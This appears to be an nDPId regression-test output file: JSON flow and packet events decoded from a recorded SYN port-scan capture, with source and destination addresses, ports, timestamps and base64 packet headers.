+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsApcAACsGGtysEAAIQA2GNIzSFLLdUoMYAAAAAGACEAAT3QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsVuIAADgGuZCsEAAIQA2GNIzSBrXdUoMYAAAAAGACBAAt2gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsSbwAADoGxLasEAAIQA2GNIzSACvdUoMYAAAAAGACDAAsZAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs1IAAACkGSvKsEAAIQA2GNIzSBGLdUoMYAAAAAGACCAAsLQAAAgQFtA=="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":2,"flow_last_seen":1278275060352,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275060352,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABGjNKWQmY93VKDGVAUAABTcgAAAAAAAAAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs6tAAADUGKKKsEAAIQA2GNIzSAsfdUoMYAAAAAGACCAAtyAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060355,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_packet_id":1,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060355,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NEAACcGMKGsEAAIQA2GNIzSgAHdUoMYAAAAAGACEACojQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsldQAADsGd56sEAAIQA2GNIzTDLzdU4MZAAAAAGACEAAb0AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsbQQAADkGom6sEAAIQA2GNIzTBJfdU4MZAAAAAGACCAAr9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsM\/UAADUG332sEAAIQA2GNIzTE7rdU4MZAAAAAGACCAAc0gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAs+SIAACoGJVCsEAAIQA2GNIzTBFHdU4MZAAAAAGACDAAoOwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060387,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_packet_id":1,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060387,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpUAAC8G6t2sEAAIQA2GNIzTgAXdU4MZAAAAAGACEACohgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsXoEAADMGtvGsEAAIQA2GNIzTH0fdU4MZAAAAAGACEAAJRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3G0AADcGNQWsEAAIQA2GNIzTNdfdU4MZAAAAAGACEADytAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsF98AACkGB5SsEAAIQA2GNIzTGAzdU4MZAAAAAGACCAAYgAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsgIEAADEGlvGsEAAIQA2GNIzTxHzdU4MZAAAAAGACCABsDwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsTM8AADIGyaOsEAAIQA2GNIzTF+DdU4MZAAAAAGACDAAUrAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsGXIAACoGBQGsEAAIQA2GNIzTHvHdU4MZAAAAAGACDAANmwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsL2kAADAG6QmsEAAIQA2GNIzTAsrdU4MZAAAAAGACBAAxwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAszLEAACsGUMGsEAAIQA2GNIzTE4jdU4MZAAAAAGACEAAVBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MEAADkGMrGsEAAIQA2GNIzTIZjdU4MZAAAAAGACCAAO9AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsA1UAADsGCh6sEAAIQA2GNIzTGgzdU4MZAAAAAGACEAAOgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs5vMAADIGL3+sEAAIQA2GNIzTBEzdU4MZAAAAAGACDAAoQAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAsVVQAADoGuR6sEAAIQA2GNIzTFGbdU4MZAAAAAGACDAAYJgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060388,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_packet_id":1,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060388,"pkt":"ACYLMQczACWzv5HuCABFAAAs6cgAAC8GL6qsEAAIQA2GNIzTB7PdU4MZAAAAAGACEAAg2QAAAgQFtA=="} 